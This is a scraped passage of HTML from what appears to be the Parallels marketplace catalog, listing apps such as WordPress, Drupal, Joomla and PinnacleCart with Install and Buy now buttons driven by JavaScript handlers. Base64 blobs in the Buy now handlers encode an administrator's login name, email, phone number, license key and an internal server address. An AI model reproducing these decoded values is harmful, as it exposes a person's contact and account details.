<h4><a href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'>WordPress</a></h4>
<div class="package-description">Easily create or maintain a website or blog</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'><img src="http://catalog.marketplace.parallels.com/storage/Pinnacle%20Cart%20Shopping%20Cart%20Software/PinnacleCart/3.7.7-350/www.pinnaclecart.com/undefined/undefined/undefined/resources/images/pinnacle-icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'>PinnacleCart</a></h4>
<div class="package-description">None</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTA0LTI2JTI1M0ElMjUyRjEuMiUyNTJGUGlubmFjbGUlMjUyNTIwQ2FydCUyNTI1MjBTaG9wcGluZyUyNTI1MjBDYXJ0JTI1MjUyMFNvZnR3YXJlJTI1MkZQaW5uYWNsZUNhcnQlMjUyRjMuNy43LTM1MCUyNTJGd3d3LnBpbm5hY2xlY2FydC5jb20lMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5waW5uYWNsZWNhcnQuY29tJTI1MkYlMjZkZXRhaWxzJTI1NUJuYW1lJTI1NUQlM0RQaW5uYWNsZUNhcnQlMjZkZXRhaWxzJTI1NUJ2ZXJzaW9uJTI1NUQlM0QzLjcuNyUyNmRldGFpbHMlMjU1QnJlbGVhc2UlMjU1RCUzRDM1MCUyNmRldGFpbHMlMjU1QnZlbmRvciUyNTVEJTNEUGlubmFjbGUlMkJDYXJ0JTJCU2hvcHBpbmclMkJDYXJ0JTJCU29mdHdhcmUlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEd3d3LnBpbm5hY2xlY2FydC5jb20lMjZkZXRhaWxzJTI1NUJpc0FwcyUyNTVEJTNEMSUyNmRldGFpbHMlMjU1QnBhY2thZ2VVcmwlMjU1RCUzRCZPcGVyYXRpb25JRD1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJmFwcF92ZW5kb3JfbmFtZT1QaW5uYWNsZStDYXJ0K1Nob3BwaW5nK0NhcnQrU29mdHdhcmUmYXBwX25hbWU9UGlubmFjbGVDYXJ0JmFwcF92ZXJzaW9uPTMuNy43JmFwcF9yZWxlYXNlPTM1MCZhcHBfZ3VpZD1odHRwJTNBJTJGJTJGd3d3LnBpbm5hY2xlY2FydC5jb20lMkYm"); apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'><img src="http://catalog.marketplace.parallels.com/storage/drupal.org/Drupal/6.16-3/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'>Drupal</a></h4>
<div class="package-description">Publish, manage and organize a wide variety of content on a website</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/pd6fm_box_mp.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'>Parallels Desktop for Mac</a></h4>
<div class="package-description">Seamlessly run Windows applications on your Mac</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTAzLTE0JTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGUGFyYWxsZWxzJTI1MjUyMERlc2t0b3AlMjUyNTIwZm9yJTI1MjUyME1hYyUyNTJGNi0wJTI1MkZQYXJhbGxlbHMlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5pbnRlcnNwaXJlLmNvbSUyNTJGa25vd2xlZGdlbWFuYWdlciUyNTJGJTI2ZGV0YWlscyUyNTVCbmFtZSUyNTVEJTNEUGFyYWxsZWxzJTJCRGVza3RvcCUyQmZvciUyQk1hYyUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDYlMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QwJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQYXJhbGxlbHMlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0RodHRwcyUyNTNBJTI1MkYlMjUyRm5jdC5wYXJhbGxlbHMuY29tJTI1MkZmdWxmaWxsJTI1MkYwMjg1LjAwMSZPcGVyYXRpb25JRD1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJmFwcF92ZW5kb3JfbmFtZT1QYXJhbGxlbHMmYXBwX25hbWU9UGFyYWxsZWxzK0Rlc2t0b3ArZm9yK01hYyZhcHBfdmVyc2lvbj02JmFwcF9yZWxlYXNlPTAmYXBwX2d1aWQ9aHR0cCUzQSUyRiUyRnd3dy5pbnRlcnNwaXJlLmNvbSUyRmtub3dsZWRnZW1hbmFnZXIlMkYm"); apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/domains-bttn-small.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'>Domain Names</a></h4>
<div class="package-description">Register a new .COM, .NET or .ORG domain name</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDEwLTEwLTA4JTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGRG9tYWluJTI1MjUyME5hbWVzJTI1MkYxLTElMjUyRlBhcmFsbGVscyUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNmRldGFpbHMlMjU1QmFwcElkJTI1NUQlM0RodHRwJTI1M0ElMjUyRiUyNTJGd3d3LnBhcmFsbGVscy5jb20lMjUyRnByb2R1Y3RzJTI1MkZkbm4lMjUyRmRvbWFpbnMlMjZkZXRhaWxzJTI1NUJuYW1lJTI1NUQlM0REb21haW4lMkJOYW1lcyUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QxJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQYXJhbGxlbHMlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0QmT3BlcmF0aW9uSUQ9UFVSQ0hBU0VfQVBQTElDQVRJT05fTElDRU5TRSZhcHBfdmVuZG9yX25hbWU9UGFyYWxsZWxzJmFwcF9uYW1lPURvbWFpbitOYW1lcyZhcHBfdmVyc2lvbj0xJmFwcF9yZWxlYXNlPTEmYXBwX2d1aWQ9aHR0cCUzQSUyRiUyRnd3dy5wYXJhbGxlbHMuY29tJTJGcHJvZHVjdHMlMkZkbm4lMkZkb21haW5zJg=="); apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'><img src="http://catalog.marketplace.parallels.com/storage/www.joomla.org/joomla/1.5.20-2/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'>joomla</a></h4>
<div class="package-description">Build website and powerful online applications</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/keepit-box.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]})'>Keepit Online Backup</a></h4>
<div class="package-description">Backup desktop files and documents to the Cloud</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDA5LTA3LTI3JTI1M0ElMjUyRm5vbmUlMjUyRktlZXBpdCUyNTJGS2VlcGl0JTI1MjUyME9ubGluZSUyNTI1MjBCYWNrdXAlMjUyRjEtMSUyNTJGS2VlcGl0JTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNTJGdW5k